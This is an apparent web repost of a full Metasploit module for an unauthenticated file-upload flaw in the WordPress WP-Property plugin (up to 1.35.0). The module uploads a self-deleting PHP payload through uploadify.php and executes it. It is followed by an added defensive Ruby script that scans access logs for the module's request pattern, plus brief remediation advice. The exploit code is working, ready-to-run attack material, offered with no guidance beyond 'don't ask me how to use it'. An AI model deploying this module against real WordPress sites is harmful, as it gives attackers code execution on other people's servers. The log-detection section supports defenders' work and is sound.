WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
WordPress WP-Property PHP File Upload Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it; I'm talking about msf.

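
A defender-side check for the request pattern the module above produces, as an added example that is not part of the original post or of Metasploit: it scans web access logs for requests to WP-Property's uploadify.php and for PHP scripts served from the same directory. The log format (Apache common/combined), the sample lines, the IP addresses and the finding names are constructed assumptions.

```ruby
# Constructed sample lines in Apache log format (not real traffic).
UPLOADIFY = '/wordpress/wp-content/plugins/wp-property/third-party/uploadify'
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120
  203.0.113.9 - - [04/Jan/2013:19:41:10 +0800] "GET #{UPLOADIFY}/uploadify.php HTTP/1.1" 200 0
  203.0.113.9 - - [04/Jan/2013:19:41:12 +0800] "POST #{UPLOADIFY}/uploadify.php HTTP/1.1" 200 74
  203.0.113.9 - - [04/Jan/2013:19:41:13 +0800] "GET #{UPLOADIFY}/AbCdE.php HTTP/1.1" 200 0
  198.51.100.7 - - [04/Jan/2013:19:42:00 +0800] "GET #{UPLOADIFY}/uploadify.css HTTP/1.1" 200 812
  192.0.2.44 - - [04/Jan/2013:19:50:00 +0800] "GET #{UPLOADIFY}/old.php HTTP/1.1" 404 209
LOG

LINE_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) /
DIR_RE  = %r{/wp-content/plugins/wp-property/third-party/uploadify/}i

# Map one request to a finding kind, or nil when it is not of interest.
def classify(method, path)
  path = path.split('?', 2).first
  return nil unless path =~ DIR_RE
  file = File.basename(path)
  if file.casecmp('uploadify.php').zero?
    method == 'POST' ? :upload_attempt : :probe
  elsif file =~ /\.(php\d?|phtml|phar)\z/i
    :script_in_upload_dir   # any other script here should not exist
  end
end

def scan(log_text)
  uploaders = {}            # client IPs whose POST to uploadify.php returned 200
  findings = []
  log_text.each_line do |line|
    m = LINE_RE.match(line) or next
    ip, time, method, path, status = m.captures
    kind = classify(method, path) or next
    uploaders[ip] = true if kind == :upload_attempt && status == '200'
    if kind == :script_in_upload_dir && status == '200' && uploaders[ip]
      kind = :upload_then_execute   # same client uploaded, then fetched a script
    end
    findings << { ip: ip, time: time, kind: kind, path: path, status: status.to_i }
  end
  findings
end

scan(SAMPLE_LOG).each { |f| puts f } if __FILE__ == $PROGRAM_NAME
```

Because the module requests its payload with `:unlink_self=>true`, the uploaded file removes itself after running, so a later search of the plugin directory can come back clean; the access log is the durable evidence. Removing or upgrading past the affected WP-Property release (<= 1.35.0 per the module description) and denying direct requests to the uploadify directory closes the path.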